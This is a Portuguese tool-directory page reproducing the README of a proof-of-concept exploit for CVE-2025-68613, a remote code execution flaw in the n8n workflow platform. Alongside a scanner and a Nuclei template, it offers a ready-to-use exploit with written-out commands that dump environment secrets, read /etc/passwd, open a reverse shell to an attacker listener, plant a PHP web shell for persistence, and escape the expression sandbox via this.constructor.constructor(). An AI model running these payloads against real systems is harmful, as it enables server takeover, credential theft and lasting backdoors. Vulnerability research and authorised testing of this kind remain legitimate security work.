Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68613-POC — PoC público + Scanner e pesquisa para CVE-2025-68613: RCE crítica na Automação de Fluxos de Trabalho n8n via Injeção de Expressão (CVSS 10.0). Inclui ferramentas de detecção, exploit completo e orientações de remediação. | Kitploit
Ferramentas/GitHubGitHub/thestingr/cve-2025-68613-poc
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoPapers e Pesquisa

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Aprendizado e Educação
Red Teaming
Desenvolvimento de Payloads
GitHubthestingr/cve-2025-68613-poc

CVE-2025-68613-POC

PoC público + Scanner e pesquisa para CVE-2025-68613: RCE crítica na Automação de Fluxos de Trabalho n8n via Injeção de Expressão (CVSS 10.0). Inclui ferramentas de detecção, exploit completo e orientações de remediação.

Ver Repositório
2623há 9 mesesRevisado pelo Kitploit
Compartilhar

🚨 CVE-2025-68613: Vulnerabilidade Crítica de RCE no n8n

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

Índice

  1. Visão Geral
  2. O que é o n8n?
  3. Fundamentos da Vulnerabilidade
  4. Detalhes Técnicos
  5. Versões Afetadas
  6. Mecânica de Exploração
  7. Impacto no Mundo Real
  8. Métodos de Detecção
  9. Remediação e Mitigação
  10. Recursos e Referências

Visão Geral

CVE-2025-68613 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) descoberta no n8n, uma plataforma popular de automação de fluxos de trabalho de código aberto. Essa vulnerabilidade permite que usuários autenticados executem código arbitrário no servidor, podendo levar ao comprometimento total do sistema.

Fatos Rápidos

  • ID do CVE: CVE-2025-68613
  • Pontuação CVSS: 9.9 - 10.0 (Crítica)
  • Tipo de Vulnerabilidade: Injeção de Expressão → Execução Remota de Código
  • CWE: CWE-913 (Controle Incorreto de Recursos de Código Gerenciados Dinamicamente)
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Sim (privilégio baixo - sem necessidade de acesso de administrador)
  • Status: Prova de Conceito disponível (verificada funcionando na v1.121.0)

O que é o n8n?

O n8n é uma plataforma de automação de fluxos de trabalho de código aberto que permite aos usuários:

  • Conectar várias APIs, bancos de dados e serviços
  • Automatizar processos de negócios repetitivos
  • Criar fluxos de trabalho complexos sem necessidade de codificação extensa
  • Implantar localmente (on-premises) ou na nuvem

Por que o n8n é Infraestrutura Crítica

As organizações usam o n8n para:

  • Integrar bancos de dados com serviços em nuvem
  • Automatizar pipelines de processamento de dados
  • Conectar CRMs, ERPs e sistemas internos
  • Gerenciar dados confidenciais e credenciais de API

Esse papel central na infraestrutura de TI torna as vulnerabilidades particularmente perigosas, pois podem fornecer aos atacantes acesso a redes inteiras e dados confidenciais.


Ferramentas Neste Repositório

Este repositório inclui ferramentas prontas para uso na detecção de vulnerabilidades e testes de exploração:

1. Scanner: cve-2025-68613-scanner.py

Objetivo: Detecção segura, sem exploração, de instâncias n8n vulneráveis

Recursos:

  • Detecção passiva de versão a partir de respostas HTTP
  • Não requer autenticação
  • Sem execução de payload
  • Verifica múltiplos caminhos comuns (/, /rest/settings, /healthz, /api/v1/health)
  • Seguro para avaliações de segurança autorizadas

Uso:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

**Saída**:
- Código de saída 0: Não vulnerável
- Código de saída 1: Versão indeterminada (pode estar corrigida ou oculta)
- Código de saída 2: Versão vulnerável detectada

### 2. Nuclei Template: `CVE-2025-68613.yaml`
**Propósito**: Detecção automatizada de vulnerabilidades e teste básico de avaliação de expressões

**Características**:
- Requer token de autenticação válido
- Testa a capacidade de injeção de expressões
- Tenta ler o contexto global do Node.js (process.platform)
- Cria fluxos de trabalho de teste para validar o vetor de RCE
- Classificação de severidade Crítica CVSS 10.0

**Uso**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. Exploit Completo: exploit_cve-2025-68613.py

Objetivo: Exploit completo de prova de conceito com múltiplos payloads de ataque

Recursos:

  • Tratamento completo de autenticação
  • Múltiplos payloads de exploração:
    • info: Coletar informações do sistema (SO, arquitetura, versão do Node.js, usuário atual)
    • cmd: Executar comandos arbitrários do sistema
    • env: Extrair todas as variáveis de ambiente (revela credenciais, chaves de API, segredos)
    • read: Ler arquivos sensíveis do sistema de arquivos (chaves SSH, arquivos de configuração, etc.)
    • write: Escrever arquivos no sistema de arquivos (persistência, backdoors, etc.)
    • revshell: Estabelecer conexão de shell reverso para acesso interativo
  • Limpeza automática do workflow
  • Tratamento de erros e relatório de status

Requisitos:

  • Credenciais válidas de usuário do n8n (email/senha)
  • Python 3.6+ com a biblioteca requests
  • Acesso de rede à instância n8n alvo

Instalação:```bash pip install requests chmod +x exploit_cve-2025-68613.py

**Exemplos de Uso**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

Como Funciona:

  1. Autentica-se no n8n usando as credenciais fornecidas
  2. Cria um workflow malicioso com payload de injeção de expressão
  3. O payload escapa da sandbox de expressões usando this.constructor.constructor()
  4. Executa o payload via process.platform ou outras APIs do Node.js
  5. Recupera os resultados da execução do workflow
  6. Faz a limpeza excluindo o workflow de teste

Códigos de Saída:

  • 0: Exploração bem-sucedida
  • 1: Autenticação ou exploração falhou

Noções Básicas da Vulnerabilidade

Qual é o Problema?

Em termos simples: o n8n permite que os usuários escrevam expressões em workflows para processar dados dinamicamente. Porém, essas expressões são avaliadas sem um sandbox adequado, permitindo que atacantes escapem do contexto de execução pretendido e executem código arbitrário no servidor.

O Problema Central

Quando você cria um workflow no n8n, você pode usar "expressões" para manipular dados. Essas expressões deveriam ser executadas em um ambiente restrito. No entanto, a vulnerabilidade mostra que essas expressões podem acessar o sistema subjacente, permitindo que um atacante:

Baixar ferramenta